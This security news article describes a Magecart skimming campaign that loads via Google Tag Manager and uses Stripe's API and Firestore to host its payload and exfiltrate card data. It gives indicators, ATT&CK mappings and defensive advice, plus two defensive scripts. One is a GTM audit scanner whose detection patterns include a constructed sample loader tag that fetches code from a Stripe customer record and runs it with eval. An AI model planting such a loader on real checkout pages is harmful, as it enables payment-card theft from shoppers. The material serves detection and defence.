
Magecart Attack Abuses Stripe as Hidden Malware Channel

A Magecart campaign is turning trusted payment infrastructure into a covert malware delivery and exfiltration channel: the skimmer itself is fetched from api.stripe.com, and the stolen card data is sent back to it.

Security researchers at Sansec have uncovered a new campaign where attackers abuse Stripe’s API and Google Tag Manager (GTM) to deploy payment skimming malware directly inside e-commerce checkout pages. Instead of relying on attacker-controlled servers, the operation leverages api.stripe.com, a domain widely trusted by online stores, to evade detection.

This approach marks a significant escalation in Magecart tactics, blending malicious activity seamlessly into legitimate payment workflows.

Key Details

According to Sansec’s findings published on June 4, 2026, the attack has likely been active since December 24, 2025, based on evidence from the Stripe account used in the campaign.

The core innovation lies in how attackers repurpose legitimate infrastructure:

  • Stripe serves as both payload host and data exfiltration channel
  • Google Tag Manager delivers the initial malware loader
  • No attacker-controlled domains are used at any stage

Because every request in the chain goes to a domain the store already has to allow, destination-based controls (WAF and egress rules, proxy allowlists, CSP connect-src) have nothing to block, and network monitoring sees only ordinary TLS sessions to api.stripe.com and Google.

Several malicious GTM containers were identified, including:

  • GTM-P6KZMF63
  • GTM-55976FLP
  • GTM-MSDHV3HG
  • GTM-TV4CSHVN

Technical Analysis

Multi-Stage Skimmer Deployment

The attack operates through a three-stage execution chain:

1. Loader Delivery via Google Tag Manager

Attackers add a malicious tag to a GTM container the store already loads, or get the page to load one of the attacker-owned containers listed above. Since GTM tags are routinely used for analytics and marketing, the extra tag looks like any other.

The loader runs on every page and activates specifically on checkout pages.

2. Payload Retrieval from Stripe

When triggered, the loader calls the Stripe API for an attacker-controlled customer record (e.g., cus_TfFjAAZQNOYENR). Reading a customer object requires a secret or restricted API key, so the loader necessarily carries a key for the attacker's own Stripe account; the merchant's Stripe credentials play no part.

The skimmer itself is stored in that customer's metadata fields, split into fragments (Stripe metadata allows at most 50 keys with values of up to 500 characters each), and the loader reassembles and runs it in the browser.

3. Data Capture and Delayed Exfiltration

Once active, the skimmer attaches to checkout events and captures:

  • Credit card number
  • Expiration date
  • CVV
  • Billing details
  • Order total

The stolen data is:

  • XOR-encoded
  • Staged in browser localStorage under the key cus_customer_id

A background routine then:

  • Polls localStorage on two timers, one firing every second and one every 60 seconds
  • Splits the payload into chunks
  • POSTs each chunk to https://api.stripe.com/v1/customers, creating bogus customer objects in the attacker's Stripe account whose fields carry the stolen data, which the attacker can then read back from their own account

This delayed exfiltration reduces immediate detection and blends traffic into normal Stripe API calls.
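The whole chain is visible from inside the page itself, because both the payload fetch and the exfiltration are outbound Stripe API calls made by page JavaScript. The following is an added example, not Sansec's code and not from the original article: a checkout-page fetch() monitor that classifies each outbound Stripe call. It rests on two facts about Stripe's API: Stripe.js authenticates only with the merchant's publishable (pk_) key, and the /v1/customers endpoint requires a secret or restricted key, so a browser never has a legitimate reason to call it. MERCHANT_PUBLISHABLE_KEY and REPORT_URL are placeholders to replace with your own values.

```javascript
// Added example: outbound-request telemetry for a checkout page.
// Not Sansec's code and not from the original article; MERCHANT_PUBLISHABLE_KEY
// and REPORT_URL are placeholders (assumptions) to replace with your own values.

const MERCHANT_PUBLISHABLE_KEY = "pk_live_MERCHANT_EXAMPLE_KEY"; // assumption: your own pk_live_ key
const REPORT_URL = "/__client-telemetry";                        // assumption: your own collector

// Case-insensitive header lookup for Headers instances, plain objects and [name, value] arrays.
function headerValue(headers, name) {
  if (!headers) return null;
  if (typeof headers.get === "function") return headers.get(name);
  const entries = Array.isArray(headers) ? headers : Object.entries(headers);
  const hit = entries.find(([k]) => String(k).toLowerCase() === name.toLowerCase());
  return hit ? hit[1] : null;
}

// Stripe accepts the API key as "Authorization: Bearer <key>" or as a form
// field "key=<key>" (the form Stripe.js uses). Return whichever is present.
// Headers/body carried inside a Request object are not inspected here.
function extractStripeKey(init) {
  const auth = headerValue(init.headers, "authorization");
  if (auth && /^Bearer\s+/i.test(auth)) return auth.replace(/^Bearer\s+/i, "").trim();
  const body = typeof init.body === "string" ? init.body
    : init.body instanceof URLSearchParams ? init.body.toString() : "";
  return new URLSearchParams(body).get("key");
}

// Classify one outbound request. Stripe.js only ever sends the merchant's
// publishable (pk_) key, and /v1/customers requires a secret or restricted key,
// so any browser call to it is anomalous regardless of the key used.
function classifyStripeRequest(url, init, merchantKey) {
  const u = new URL(url, "https://placeholder.invalid"); // base only matters for relative URLs
  if (u.hostname !== "api.stripe.com") return { suspicious: false, reason: "not a Stripe API call" };
  const method = (init.method || "GET").toUpperCase();
  if (u.pathname.startsWith("/v1/customers")) {
    return { suspicious: true, reason: method + " " + u.pathname + ": customer objects are never read or written from a checkout page" };
  }
  const key = extractStripeKey(init);
  if (!key) return { suspicious: true, reason: "Stripe API call without an API key" };
  if (/^(sk|rk)_(live|test)_/.test(key)) return { suspicious: true, reason: "secret/restricted key (" + key.slice(0, 8) + "...) used in the browser" };
  if (key !== merchantKey) return { suspicious: true, reason: "publishable key " + key.slice(0, 12) + "... belongs to another Stripe account" };
  return { suspicious: false, reason: "merchant key, non-customer endpoint" };
}

// Wrap window.fetch so each request is classified before it leaves the page.
// The request is still sent: this is telemetry, not a blocker.
function installFetchMonitor(win, report, merchantKey) {
  const originalFetch = win.fetch.bind(win);
  win.fetch = function monitoredFetch(input, init) {
    const url = typeof input === "string" ? input : (input.url || String(input));
    const verdict = classifyStripeRequest(url, init || {}, merchantKey);
    if (verdict.suspicious) report({ url, ...verdict });
    return originalFetch(input, init);
  };
}

// Browser only: when unit-testing the classifier in Node there is no window.
if (typeof window !== "undefined") {
  installFetchMonitor(window, (finding) => {
    // sendBeacon survives navigation away from the page, which matters on checkout.
    navigator.sendBeacon(REPORT_URL, JSON.stringify(finding));
  }, MERCHANT_PUBLISHABLE_KEY);
}
```

Wrapping XMLHttpRequest the same way covers skimmers that avoid fetch(); navigator.sendBeacon() calls to api.stripe.com would need their own wrapper. Because the monitor is itself JavaScript in the same page, a skimmer that loads first can remove or bypass it, so serve it as early as possible and treat its output as telemetry for hunting, not as a control.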

Second Variant Using Google Firestore

Sansec also identified a variant leveraging Google Firestore, specifically a project named:

  • braintree-payment-app

In this version:

  • Skimmer payload is hosted in Firestore documents
  • Stolen data is exfiltrated through benign-looking calls to the Firestore API (firestore.googleapis.com)
  • Browser storage key changes to d_data_customer

This demonstrates attacker adaptability and a growing reliance on cloud-native abuse techniques.

MITRE ATT&CK Alignment

The campaign maps to several techniques, including:

  • T1059.007 – Command and Scripting Interpreter: JavaScript
  • T1567 – Exfiltration Over Web Service
  • T1071.001 – Application Layer Protocol: Web Protocols (HTTPS to trusted APIs)
  • T1027 – Obfuscated Files or Information (XOR-encoded, fragmented payload)

Impact and Risks

E-commerce Platforms at Risk

Any online store that loads:

  • Google Tag Manager, or any third-party tag that can be edited outside the store's own release process (the entry point)
  • Stripe, or another payment provider whose API domains are already allowlisted (the cover)

is exposed if tags and scripts are not properly controlled. Because the attacker uses their own Stripe account, a store does not have to be a Stripe merchant to be hit; stores that do integrate Stripe are simply the ones where traffic to api.stripe.com is expected and nobody questions it.

Invisible Data Exfiltration

Because all traffic routes through trusted domains, organizations face:

  • No obvious malicious domains to block
  • Minimal alerts from network security tools
  • Increased dwell time for attackers

Financial and Compliance Risks

Compromised card data can lead to:

  • Direct financial fraud
  • PCI DSS violations; v4.0 requirements 6.4.3 and 11.6.1 specifically call for inventorying and authorizing payment-page scripts and detecting unauthorized changes to them, which an unreviewed GTM tag defeats
  • Brand damage and customer trust erosion

Persistent Client-Side Threats

Unlike server-side breaches, this attack lives in the client-side environment, making it:

  • Harder to detect with standard backend monitoring
  • Dependent on script integrity and browser-level visibility

Expert Recommendations

To defend against this advanced Magecart campaign, organizations should adopt a client-side security-first approach:

1. Audit Google Tag Manager Configurations

  • Remove unauthorized or unknown tags
  • Restrict access to GTM accounts
  • Implement approval workflows for changes

2. Inspect Front-End Code for Sensitive Keys and Unexpected API Calls

  • The loader must authenticate to the attacker's Stripe account, so any sk_live_ or rk_live_ (or _test_) key in client-side JavaScript is an indicator whether or not it is yours; a publishable pk_ key that is not your own is equally telling
  • Never expose your own Stripe secret keys in client-side JavaScript either
  • Scan for suspicious API calls to:
    • api.stripe.com (especially /v1/customers, which a browser never legitimately calls)
    • firestore.googleapis.com
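Items 1 and 2 can be done offline against the container itself. The following is an added example, not from the article or from Sansec: a JavaScript audit of a Google Tag Manager container export. GTM's Admin > Export Container produces JSON with a containerVersion.tag array; Custom HTML tags have type "html" and hold their markup in the parameter keyed "html". The scanner flags the indicators described above plus generic decode/eval patterns. SAMPLE_EXPORT is constructed for the example; its container id, key and customer id are fake, and the GA4 tag's type id is incidental.

```javascript
// Added example: offline audit of a Google Tag Manager container export.
// Not from Sansec or the original article. GTM's "Export Container" produces
// JSON with containerVersion.tag[]; Custom HTML tags have type "html" and hold
// their markup in the parameter keyed "html". SAMPLE_EXPORT below is constructed.

const INDICATORS = [
  { id: "stripe-customers", why: "customer endpoint needs a secret key; never legitimate in a tag",
    re: /api\.stripe\.com\/v1\/customers/i },
  { id: "stripe-secret-key", why: "Stripe secret or restricted key embedded in client-side code",
    re: /\b(sk|rk)_(live|test)_[0-9A-Za-z]{8,}/ },
  { id: "stripe-customer-id", why: "hard-coded Stripe customer id (payload host in this campaign)",
    re: /\bcus_[0-9A-Za-z]{10,}\b/ },
  { id: "firestore", why: "Firestore used as payload host and exfil channel in the second variant",
    re: /firestore\.googleapis\.com/i },
  { id: "staging-key", why: "localStorage staging keys reported for the two variants",
    re: /localStorage\.(setItem|getItem)\(\s*["'](cus_customer_id|d_data_customer)["']/ },
  { id: "dynamic-decode", why: "char-code/XOR decoding or eval, typical of in-browser payload reconstruction",
    re: /String\.fromCharCode|charCodeAt\([^)]*\)\s*\^|\batob\(|\beval\(/ },
];

// Custom HTML tags keep their markup in the "html" parameter; for every other
// tag type the serialized parameters are scanned so a hostile URL in, say, a
// Custom Image tag is still seen.
function tagSource(tag) {
  if (tag.type === "html") {
    const p = (tag.parameter || []).find((x) => x.key === "html");
    return p && typeof p.value === "string" ? p.value : "";
  }
  return JSON.stringify(tag.parameter || []);
}

// Return one finding per tag that matches at least one indicator.
function auditContainer(exportJson) {
  const version = exportJson.containerVersion || {};
  const tags = version.tag || [];
  const findings = [];
  for (const tag of tags) {
    const source = tagSource(tag);
    const hits = INDICATORS.filter((ind) => ind.re.test(source));
    if (hits.length > 0) {
      findings.push({
        container: version.container ? version.container.publicId : undefined,
        tag: tag.name,
        tagId: tag.tagId,
        type: tag.type,
        hits: hits.map((h) => h.id),
        why: hits.map((h) => h.why),
      });
    }
  }
  return findings;
}

// Constructed sample: one ordinary GA4 tag and one Custom HTML tag shaped like
// the loader described above. Container id, key and customer id are fake.
const SAMPLE_EXPORT = {
  exportFormatVersion: 2,
  containerVersion: {
    container: { publicId: "GTM-EXAMPLE0" },
    tag: [
      { tagId: "1", name: "GA4 Configuration", type: "gaawc",
        parameter: [{ type: "TEMPLATE", key: "measurementId", value: "G-EXAMPLE000" }] },
      { tagId: "7", name: "Checkout helper", type: "html",
        parameter: [{ type: "TEMPLATE", key: "html", value:
          "<script>if(location.pathname.indexOf('checkout')>-1){" +
          "fetch('https://api.stripe.com/v1/customers/cus_EXAMPLE000000000'," +
          "{headers:{Authorization:'Bearer rk_live_EXAMPLEKEY000000'}})" +
          ".then(function(r){return r.json()})" +
          ".then(function(c){eval(Object.values(c.metadata).join(''))});" +
          "localStorage.setItem('cus_customer_id','');}</script>" }] },
    ],
  },
};

// Usage: node audit.js  (prints the flagged tags of the constructed sample)
console.log(JSON.stringify(auditContainer(SAMPLE_EXPORT), null, 2));
```

Run it against every container the store loads, including any the checkout page references that are not in your own GTM account, and diff successive exports so a tag that appears between two publishes stands out even when its content evades the patterns above.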

3. Deploy Client-Side Monitoring Tools

  • Use solutions that detect unauthorized script behavior
  • Monitor DOM changes and checkout page interactions

4. Implement Content Security Policy (CSP)

  • Restrict which scripts can execute on checkout pages; ideally do not load GTM on the payment step at all
  • Know its limits here: CSP matches script-src by scheme, host and path, not by query string, so it cannot tell your GTM container apart from an attacker's on www.googletagmanager.com; and connect-src must already allow api.stripe.com for Stripe.js to work, so CSP does not close this campaign's exfiltration channel. Use it to shrink the script surface, not as the exfiltration control.

5. Enable Subresource Integrity (SRI)

  • Ensure external scripts have not been tampered with
  • Caveat: SRI needs a fixed hash, and gtm.js (like Stripe.js) changes whenever the container is republished or the vendor ships an update, so it cannot be pinned this way; SRI protects self-hosted or version-pinned scripts only

6. Conduct Regular Security Audits

  • Review third-party integrations
  • Perform continuous threat hunting on web assets

Industry Context

Magecart groups have historically relied on malicious domains and injected scripts, but this campaign marks a shift toward platform abuse attacks.

Similar trends are emerging across cybersecurity:

  • Abuse of cloud platforms like AWS, Azure, and Google Cloud
  • Fileless attacks that blend into normal traffic
  • Increasing focus on client-side supply chain threats

By leveraging trusted ecosystems, attackers bypass traditional defenses and exploit implicit trust models built into modern applications.

This evolution signals a broader industry challenge: trust is becoming a liability when not continuously verified.

Conclusion

The latest Magecart campaign demonstrates how attackers are innovating beyond traditional skimming techniques—weaponizing trusted platforms like Stripe and Google to stay invisible.

As e-commerce ecosystems grow more complex, organizations must move beyond perimeter defenses and adopt deep visibility into client-side activity.

In today’s threat landscape, what you trust may already be compromised.

FAQ

1. What is the Magecart Stripe attack?

It is a credit card skimming attack that uses Stripe’s API to host malware and exfiltrate stolen data instead of using attacker-controlled servers.

2. Why is this attack difficult to detect?

Because it uses trusted domains like api.stripe.com and Google Tag Manager, which are typically allowed in security policies.

3. What data does the malware steal?

It captures credit card details, including card number, CVV, expiration date, billing address, and transaction data.

4. How does Google Tag Manager play a role?

Attackers inject malicious scripts into GTM containers, allowing malware to load alongside legitimate analytics scripts.

5. How can e-commerce sites protect themselves?

By auditing GTM tags, monitoring client-side scripts, enforcing CSP policies, and avoiding exposure of sensitive API keys.
